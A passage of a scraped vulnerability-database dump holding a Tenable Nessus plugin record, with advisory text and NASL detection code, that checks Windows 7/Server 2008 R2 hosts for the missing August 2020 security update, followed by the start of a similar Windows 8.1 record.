4571729. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects. An attacker who successfully exploited the vulnerability could take control of an affected system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Audio Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists in the way that the srmsvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system (CVE-2020-1383)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1486)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - A remote code execution vulnerability exists when the Windows Font Driver Host improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when the Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An elevation of privilege vulnerability exists when the Windows File Server Resource Management Service improperly handles memory. (CVE-2020-1517, CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - An elevation of privilege vulnerability exists when the Windows Remote Access improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1534)\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network. (CVE-2020-1472)\n\n - An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system. A locally authenticated attacker could exploit this vulnerability by running a specially crafted application. The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the Windows Ancillary Function Driver for WinSock improperly handles memory. (CVE-2020-1587)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558, CVE-2020-1564)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes input. An attacker who successfully exploited this vulnerability could take control of an affected system. (CVE-2020-1046)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1567)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1529)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the Windows Function Discovery SSDP Provider improperly handles memory. (CVE-2020-1579)\n\n - An elevation of privilege vulnerability exists when ASP.NET or .NET web applications running on IIS improperly allow access to cached files. An attacker who successfully exploited this vulnerability could gain access to restricted files. (CVE-2020-1476)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1562)\n\n - A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files. In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded. The update addresses the vulnerability by correcting how Windows validates file signatures.\n (CVE-2020-1464)", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "nessus", "title": "KB4571719: Windows 7 and Windows Server 2008 R2 August 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1046", "CVE-2020-1337", "CVE-2020-1339", "CVE-2020-1377", "CVE-2020-1378", "CVE-2020-1379", "CVE-2020-1380", "CVE-2020-1383", "CVE-2020-1464", "CVE-2020-1467", "CVE-2020-1470", "CVE-2020-1472", "CVE-2020-1473", "CVE-2020-1474", "CVE-2020-1475", "CVE-2020-1476", "CVE-2020-1477", "CVE-2020-1478", "CVE-2020-1484", "CVE-2020-1485", "CVE-2020-1486", "CVE-2020-1489", "CVE-2020-1513", "CVE-2020-1515", "CVE-2020-1516", "CVE-2020-1517", "CVE-2020-1518", "CVE-2020-1519", "CVE-2020-1520", "CVE-2020-1529", "CVE-2020-1530", "CVE-2020-1534", "CVE-2020-1537", "CVE-2020-1538", "CVE-2020-1552", "CVE-2020-1554", "CVE-2020-1557", "CVE-2020-1558", "CVE-2020-1562", "CVE-2020-1564", "CVE-2020-1567", "CVE-2020-1570", "CVE-2020-1577", "CVE-2020-1579", "CVE-2020-1584", "CVE-2020-1587"], "modified": "2023-05-23T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_AUG_4571729.NASL", "href": "https://www.tenable.com/plugins/nessus/139491", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139491);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\n \"CVE-2020-1046\",\n \"CVE-2020-1337\",\n \"CVE-2020-1339\",\n \"CVE-2020-1377\",\n \"CVE-2020-1378\",\n \"CVE-2020-1379\",\n \"CVE-2020-1380\",\n \"CVE-2020-1383\",\n \"CVE-2020-1464\",\n \"CVE-2020-1467\",\n \"CVE-2020-1470\",\n \"CVE-2020-1472\",\n \"CVE-2020-1473\",\n \"CVE-2020-1474\",\n \"CVE-2020-1475\",\n \"CVE-2020-1476\",\n \"CVE-2020-1477\",\n \"CVE-2020-1478\",\n \"CVE-2020-1484\",\n \"CVE-2020-1485\",\n \"CVE-2020-1486\",\n \"CVE-2020-1489\",\n \"CVE-2020-1513\",\n \"CVE-2020-1515\",\n \"CVE-2020-1516\",\n \"CVE-2020-1517\",\n \"CVE-2020-1518\",\n \"CVE-2020-1519\",\n \"CVE-2020-1520\",\n \"CVE-2020-1529\",\n \"CVE-2020-1530\",\n \"CVE-2020-1534\",\n \"CVE-2020-1537\",\n \"CVE-2020-1538\",\n \"CVE-2020-1552\",\n \"CVE-2020-1554\",\n \"CVE-2020-1557\",\n \"CVE-2020-1558\",\n \"CVE-2020-1562\",\n \"CVE-2020-1564\",\n \"CVE-2020-1567\",\n \"CVE-2020-1570\",\n \"CVE-2020-1577\",\n \"CVE-2020-1579\",\n \"CVE-2020-1584\",\n \"CVE-2020-1587\"\n );\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"IAVA\", value:\"2020-A-0367-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"MSKB\", value:\"4571719\");\n script_xref(name:\"MSKB\", value:\"4571729\");\n script_xref(name:\"MSFT\", value:\"MS20-4571719\");\n script_xref(name:\"MSFT\", value:\"MS20-4571729\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"KB4571719: Windows 7 and Windows Server 2008 R2 August 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4571719\nor cumulative update 4571729. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Windows Media Audio Codec improperly handles objects. An\n attacker who successfully exploited the vulnerability\n could take control of an affected system. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media Audio\n Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists in the\n way that the srmsvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An information disclosure vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system (CVE-2020-1383)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1379,\n CVE-2020-1477, CVE-2020-1478, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1486)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - A remote code execution vulnerability exists when the\n Windows Font Driver Host improperly handles memory. An\n attacker who successfully exploited the vulnerability\n would gain execution on a victim system. The security\n update addresses the vulnerability by correcting how the\n Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when the\n Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An elevation of privilege vulnerability exists when the\n Windows File Server Resource Management Service\n improperly handles memory. (CVE-2020-1517,\n CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the\n way that the dnsrslvr.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when\n Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - An elevation of privilege vulnerability exists when the\n Windows Remote Access improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1534)\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC). An attacker who\n successfully exploited the vulnerability could run a\n specially crafted application on a device on the\n network. (CVE-2020-1472)\n\n - An elevation of privilege vulnerability exists when the\n Windows Kernel API improperly handles registry objects\n in memory. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a\n targeted system. A locally authenticated attacker could\n exploit this vulnerability by running a specially\n crafted application. The security update addresses the\n vulnerability by helping to ensure that the Windows\n Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the\n Windows Image Acquisition (WIA) Service improperly\n discloses contents of its memory. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the\n Windows Ancillary Function Driver for WinSock improperly\n handles memory. (CVE-2020-1587)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558,\n CVE-2020-1564)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes input. An attacker\n who successfully exploited this vulnerability could take\n control of an affected system. (CVE-2020-1046)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1567)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-1529)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the\n Windows Function Discovery SSDP Provider improperly\n handles memory. (CVE-2020-1579)\n\n - An elevation of privilege vulnerability exists when\n ASP.NET or .NET web applications running on IIS\n improperly allow access to cached files. An attacker who\n successfully exploited this vulnerability could gain\n access to restricted files. (CVE-2020-1476)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1562)\n\n - A spoofing vulnerability exists when Windows incorrectly\n validates file signatures. An attacker who successfully\n exploited this vulnerability could bypass security\n features and load improperly signed files. In an attack\n scenario, an attacker could bypass security features\n intended to prevent improperly signed files from being\n loaded. The update addresses the vulnerability by\n correcting how Windows validates file signatures.\n (CVE-2020-1464)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4571729/windows-7-update\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4571719/windows-7-update\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4571719 or Cumulative Update KB4571729.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1564\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-08';\nkbs = make_list(\n '4571729',\n '4571719'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'08_2020',\n bulletin:bulletin,\n rollup_kb_list:[4571729, 4571719])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:22:03", "description": "The remote Windows host is missing security update 4571723 or cumulative update 4571703. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects. An attacker who successfully exploited the vulnerability could take control of an affected system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Audio Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when the Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system (CVE-2020-1383)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - A denial of service vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RD Gateway service on the target system to stop responding.\n (CVE-2020-1466)\n\n - An elevation of privilege vulnerability exists in the Local Security Authority Subsystem Service (LSASS) when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause an elevation of privilege on the target system's LSASS service. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the Windows Font Driver Host improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system. A locally authenticated attacker could exploit this vulnerability by running a specially crafted application. The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the Windows File Server Resource Management Service improperly handles memory. (CVE-2020-1517, CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-1565)\n\n - A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files. In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded. The update addresses the vulnerability by correcting how Windows validates file signatures.\n (CVE-2020-1464)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1486)\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network. (CVE-2020-1472)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1492, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the Windows Ancillary Function Driver for WinSock improperly handles memory. (CVE-2020-1587)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558, CVE-2020-1564)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes input. An attacker who successfully exploited this vulnerability could take control of an affected system. (CVE-2020-1046)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1567)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1529)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the Windows Function Discovery SSDP Provider improperly handles memory. (CVE-2020-1579)\n\n - An elevation of privilege vulnerability exists when ASP.NET or .NET web applications running on IIS improperly allow access to cached files. An attacker who successfully exploited this vulnerability could gain access to restricted files. (CVE-2020-1476)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1562)\n\n - An elevation of privilege vulnerability exists in the way that the srmsvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1475)", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "nessus", "title": "KB4571723: Windows 8.1 and Windows Server 2012 R2 August 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1046", "CVE-2020-1337", "CVE-2020-1339", "CVE-2020-1377", "CVE-2020-1378", "CVE-2020-1379", "CVE-2020-1380", "CVE-2020-1383", "CVE-2020-1464", "CVE-2020-1466", "CVE-2020-1467", "CVE-2020-1470", "CVE-2020-1472", "CVE-2020-1473", "CVE-2020-1474", "CVE-2020-1475", "CVE-2020-1476", 